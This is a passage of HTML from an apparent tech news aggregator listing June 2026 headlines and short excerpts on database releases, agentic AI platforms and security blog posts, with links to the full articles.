              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what a software bill of materials (SBOM) is, why it matters for supply chain security, how to generate one, and what formats and standards to use.</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/what-is-an-sbom/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-databases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-pgtt-v45-has-been-released" class="group relative scroll-mt-24">
        <a href="#h3-pgtt-v45-has-been-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pgtt v4.5 has been released
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pgtt-v45-has-been-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Bangkok, Thailand - June 21, 2026 PostgreSQL Global Temporary Tables pgtt is a PostgreSQL extension to create, manage and use DB2 or Oracle-style Global Temporary Tables. Once created the use is just </p>
<p><strong>📅 Jun 28, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgtt-v45-has-been-released-3330/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pg_qualstats-214-is-out" class="group relative scroll-mt-24">
        <a href="#h3-pg_qualstats-214-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_qualstats 2.1.4 is out!
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pg_qualstats-214-is-out"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Taipei, Taiwan - Sat 20 Jun pg_qualstats 2.1.4 The PoWA team is pleased to announce the release of the version 2.1.4 of pg_qualstats, a PostgreSQL extension keeping statistics on predicates found in W</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_qualstats-214-is-out-3327/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pg_stat_kcache-232-is-out" class="group relative scroll-mt-24">
        <a href="#h3-pg_stat_kcache-232-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_stat_kcache 2.3.2 is out!
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pg_stat_kcache-232-is-out"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Taipei, Taiwan - Sat 20 Jun pg_stat_kcache 2.3.2 The PoWA team is pleased to announce the release of the version 2.3.2 of pg_stat_kcache, an extension that gathers statistics about real reads and writ</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_stat_kcache-232-is-out-3328/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgedge-announces-coldfront-for-postgresql-seamlessly-uniting-ai-analytical-and-oltp-workloads" class="group relative scroll-mt-24">
        <a href="#h3-pgedge-announces-coldfront-for-postgresql-seamlessly-uniting-ai-analytical-and-oltp-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pgEdge Announces ColdFront for PostgreSQL, Seamlessly Uniting AI, Analytical and OLTP Workloads
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pgedge-announces-coldfront-for-postgresql-seamlessly-uniting-ai-analytical-and-oltp-workloads"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Offers read and write access to hot and cold storage with no application code changes, delivering up to 90% savings in storage ALEXANDRIA, Va., June 18, 2026 — pgEdge, the leading open source enterpri</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgedge-announces-coldfront-for-postgresql-seamlessly-uniting-ai-analytical-and-oltp-workloads-3325/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-10-years-of-mongodb-atlas-built-for-whats-next" class="group relative scroll-mt-24">
        <a href="#h3-10-years-of-mongodb-atlas-built-for-whats-next" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 10 Years of MongoDB Atlas: Built for What’s Next
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-10-years-of-mongodb-atlas-built-for-whats-next"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Nearly a decade ago, I joined MongoDB as a Senior Product Manager to help build the company’s new cloud product, MongoDB Atlas. Our customers had been telling us they wanted to bring MongoDB’s familia</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/news/10-years-mongodb-atlas-built-for-whats-next"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-using-salting-to-lower-latency-for-large-blobs-in-scylladb" class="group relative scroll-mt-24">
        <a href="#h3-using-salting-to-lower-latency-for-large-blobs-in-scylladb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Using Salting to Lower Latency for Large Blobs in ScyllaDB
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-using-salting-to-lower-latency-for-large-blobs-in-scylladb"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A modified salting technique that cuts P99 write latency 22x for large blobs</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/25/using-salting-to-lower-latency-for-large-blobs-in-scylladb/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-hunting-a-16-year-old-sqlite-bug-with-tla-is-dqlite-affected" class="group relative scroll-mt-24">
        <a href="#h3-hunting-a-16-year-old-sqlite-bug-with-tla-is-dqlite-affected" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Hunting a 16-year-old SQLite bug with TLA+: is dqlite affected?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-hunting-a-16-year-old-sqlite-bug-with-tla-is-dqlite-affected"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This article was written by Marco Manino and Alberto Carretero, dqlite team at Canonical. 1. Anatomy of a SQLite bug Recently SQLite published a new version with a fix to a long-standing bug in the wa</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/hunting-a-16-year-old-sqlite-bug-with-tla-is-dqlite-affected"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-riding-the-raft-to-strong-consistency-in-scylladb" class="group relative scroll-mt-24">
        <a href="#h3-riding-the-raft-to-strong-consistency-in-scylladb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Riding the Raft to Strong Consistency in ScyllaDB
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-riding-the-raft-to-strong-consistency-in-scylladb"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>How ScyllaDB is using per-tablet Raft groups to bring strong consistency to data, without sacrificing the parallelism that makes it fast</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/24/raft-strong-consistency/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-knowledge-graph-retrieval-augmented-generation-rag-structured-retrieval-for-ai-agents" class="group relative scroll-mt-24">
        <a href="#h3-knowledge-graph-retrieval-augmented-generation-rag-structured-retrieval-for-ai-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Knowledge graph retrieval-augmented generation (RAG): structured retrieval for AI agents
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-knowledge-graph-retrieval-augmented-generation-rag-structured-retrieval-for-ai-agents"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A user asks your support agent: &quot;is the slow-sync bug from my last ticket fixed in the version you told me to upgrade to?&quot; Answering means connecting three documents: the customer&#39;s earlier ticket, th</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/knowledge-graph-rag-structured-retrieval-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-fintech-ai-platform-why-agents-need-one-database-not-five" class="group relative scroll-mt-24">
        <a href="#h3-the-fintech-ai-platform-why-agents-need-one-database-not-five" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Fintech AI Platform: Why Agents Need One Database, Not Five
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-fintech-ai-platform-why-agents-need-one-database-not-five"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A few months ago I watched a fintech engineering team walk me through their AI agent platform. They had a transactional database for balances and ledgers, a separate vector database for semantic retri</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/database-for-fintech-ai-agent-platform/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-trust-in-agentic-ai-from-poc-to-production" class="group relative scroll-mt-24">
        <a href="#h3-build-trust-in-agentic-ai-from-poc-to-production" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build Trust in Agentic AI: From POC to Production
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-build-trust-in-agentic-ai-from-poc-to-production"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The enterprise adoption of artificial intelligence has reached an inflection point. Organizations are rapidly moving into the era of agentic AI, autonomous systems capable of executing complex reasoni</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/innovation/build-trust-in-agentic-ai-from-poc-to-production"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-context-engineering-vs-prompt-engineering-the-real-difference" class="group relative scroll-mt-24">
        <a href="#h3-context-engineering-vs-prompt-engineering-the-real-difference" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Context engineering vs prompt engineering: the real difference
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-context-engineering-vs-prompt-engineering-the-real-difference"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A customer asks your support agent whether their refund went through. The agent checks, says yes, and cites a confirmation number. The refund actually bounced back twenty minutes ago, but the lookup t</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/context-engineering-vs-prompt-engineering/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-oracle-of-delphi-will-steal-your-credentials"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-call-for-contributors-opentelemetry-for-dart-and-flutter" class="group relative scroll-mt-24">
        <a href="#h3-call-for-contributors-opentelemetry-for-dart-and-flutter" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Call for Contributors: OpenTelemetry for Dart and Flutter
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-call-for-contributors-opentelemetry-for-dart-and-flutter"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Why OpenTelemetry for Dart and Flutter? Dart is a full-stack language and the language of Flutter, one of the most popular frameworks for building cross-platform applications. Data shows over 20% of c</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/dart-flutter-opentelemetry/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bring-it-to-our-shop-workdays-pitch-for-keeping-ai-agents-close-to-your-most-valuable-data" class="group relative scroll-mt-24">
        <a href="#h3-bring-it-to-our-shop-workdays-pitch-for-keeping-ai-agents-close-to-your-most-valuable-data" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 “Bring it to our shop”: Workday’s pitch for keeping AI agents close to your most valuable data
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-bring-it-to-our-shop-workdays-pitch-for-keeping-ai-agents-close-to-your-most-valuable-data"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Workday, the payroll and HR data platform, has been pursuing AI and agents for a while, but while other businesses The post “Bring it to our shop”: Workday’s pitch for keeping AI agents close to your </p>
<p><strong>📅 Jun 28, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/workday-ai-inference-guardrails/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-okta-is-the-first-to-bring-ai-agent-governance-inside-fedramp-boundaries" class="group relative scroll-mt-24">
        <a href="#h3-okta-is-the-first-to-bring-ai-agent-governance-inside-fedramp-boundaries" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Okta is the first to bring AI agent governance inside FedRAMP boundaries
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-okta-is-the-first-to-bring-ai-agent-governance-inside-fedramp-boundaries"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Okta has made its AI agent governance platform generally available for FedRAMP- and HIPAA-regulated environments, becoming what it claims is the first independent The post Okta is the first to bring A</p>
<p><strong>📅 Jun 28, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/okta-ai-agents-fedramp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-agentic-ai-with-perimeter-guardrails-whats-new-in-vpc-service-controls" class="group relative scroll-mt-24">
        <a href="#h3-securing-agentic-ai-with-perimeter-guardrails-whats-new-in-vpc-service-controls" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing agentic AI with perimeter guardrails: What's new in VPC Service Controls
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-securing-agentic-ai-with-perimeter-guardrails-whats-new-in-vpc-service-controls"
        >
